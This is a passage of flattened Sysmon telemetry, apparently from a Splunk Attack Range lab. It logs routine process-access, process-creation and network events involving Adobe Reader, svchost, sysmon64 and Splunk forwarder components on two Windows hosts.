DC\Reader\AcroRd32.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\System32\SHELL32.dll+8a3be|C:\Windows\Explorer.EXE+3c648|C:\Windows\Explorer.EXE+3c4d4|C:\Windows\Explorer.EXE+3c441|C:\Windows\System32\windows.storage.dll+12703f|C:\Windows\System32\windows.storage.dll+125dbf|C:\Windows\System32\windows.storage.dll+19d7df|C:\Windows\System32\SHCORE.dll+367b6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000047683Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:30.651{FE4C2B44-DDF9-63C7-C404-00000000AF02}52003472C:\Windows\Explorer.EXE{FE4C2B44-E64B-63C7-8806-00000000AF02}5560C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\System32\SHELL32.dll+897d4|C:\Windows\System32\SHELL32.dll+8a387|C:\Windows\Explorer.EXE+3c648|C:\Windows\Explorer.EXE+3c4d4|C:\Windows\Explorer.EXE+3c441|C:\Windows\System32\windows.storage.dll+12703f|C:\Windows\System32\windows.storage.dll+125dbf|C:\Windows\System32\windows.storage.dll+19d7df|C:\Windows\System32\SHCORE.dll+367b6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000047682Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:30.648{FE4C2B44-DA67-63C7-AE00-00000000AF02}49123668C:\Windows\system32\conhost.exe{FE4C2B44-E666-63C7-9506-00000000AF02}5644C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000047681Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:30.646{FE4C2B44-E64A-63C7-8706-00000000AF02}14005372C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe{FE4C2B44-E64B-63C7-8806-00000000AF02}5560C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+86239|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+8609e|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+74afe|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+74a0a|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+7400b|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+73d30|C:\Windows\SYSTEM32\ntdll.dll+21784(wow64)|C:\Windows\SYSTEM32\ntdll.dll+57de5(wow64)|C:\Windows\SYSTEM32\ntdll.dll+57d2a(wow64)|C:\Windows\SYSTEM32\ntdll.dll+34e2a(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000047680Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:30.645{FE4C2B44-E64A-63C7-8706-00000000AF02}14005372C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe{FE4C2B44-E64B-63C7-8806-00000000AF02}5560C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+86239|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+8609e|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+74afe|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+74a0a|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+7400b|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+73d30|C:\Windows\SYSTEM32\ntdll.dll+21784(wow64)|C:\Windows\SYSTEM32\ntdll.dll+57de5(wow64)|C:\Windows\SYSTEM32\ntdll.dll+57d2a(wow64)|C:\Windows\SYSTEM32\ntdll.dll+34e2a(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000047679Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:30.644{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8326916C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000047678Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:30.644{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8326916C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000047677Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:30.643{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8326916C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000047676Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:30.643{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8326916C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000047675Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:30.622{FE4C2B44-D9F3-63C7-0500-00000000AF02}408524C:\Windows\system32\csrss.exe{FE4C2B44-E666-63C7-9506-00000000AF02}5644C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000047674Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:30.622{FE4C2B44-DA67-63C7-AA00-00000000AF02}20924876C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{FE4C2B44-E666-63C7-9506-00000000AF02}5644C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7424|C:\Windows\System32\KERNELBASE.dll+24890|C:\Windows\System32\KERNELBASE.dll+22e56|C:\Windows\System32\KERNEL32.DLL+1c373|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e499f1|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b3255|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd30d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b59b6|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd3c14|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd79a|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1c0f1c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd07d2|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd491d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bb965|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dc694e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000047673Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:30.482{FE4C2B44-E666-63C7-9506-00000000AF02}5644C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.2.5Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{FE4C2B44-D9F3-63C7-E703-000000000000}0x3e70SystemMD5=611F936426EC989CDC9FB43B692D3CFA,SHA256=AF94FF9B82C4BF6F27A5695E741D2BDF06A6A574924179D0BC9E7B8A725882F5,IMPHASH=A2763C4BA6D4717F662584401724A6B2{FE4C2B44-DA67-63C7-AA00-00000000AF02}2092C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x800000000000000047725Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:29.544{FE4C2B44-DA6F-63C7-DB00-00000000AF02}4048C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-ctus-attack-range-271.attackrange.local56484-false10.0.1.12-8000- 10341000x800000000000000018845Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:30:31.808{E5A8D418-E667-63C7-3F02-00000000B002}28123864C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{E5A8D418-DCC0-63C7-9F00-00000000B002}3096C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+606005|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+605b36|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+75996|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+9dd220|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018844Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:30:31.636{E5A8D418-DCC0-63C7-A300-00000000B002}9683180C:\Windows\system32\conhost.exe{E5A8D418-E667-63C7-3F02-00000000B002}2812C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018843Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:30:31.636{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018842Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:30:31.636{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018841Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:30:31.636{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018840Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:30:31.636{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018839Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:30:31.636{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018838Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:30:31.636{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018837Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:30:31.636{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018836Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:30:31.636{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018835Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:30:31.636{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018834Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:30:31.636{E5A8D418-DC43-63C7-0500-00000000B002}416532C:\Windows\system32\csrss.exe{E5A8D418-E667-63C7-3F02-00000000B002}2812C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000018833Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:30:31.636{E5A8D418-DCC0-63C7-9F00-00000000B002}30963280C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{E5A8D418-E667-63C7-3F02-00000000B002}2812C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7424|C:\Windows\System32\KERNELBASE.dll+24890|C:\Windows\System32\KERNELBASE.dll+22e56|C:\Windows\System32\KERNEL32.DLL+1c373|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e499f1|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b3255|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd30d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b59b6|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd3c14|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd79a|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1c0f1c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd07d2|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd491d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bb965|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dc694e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000018832Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:30:31.637{E5A8D418-E667-63C7-3F02-00000000B002}2812C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT 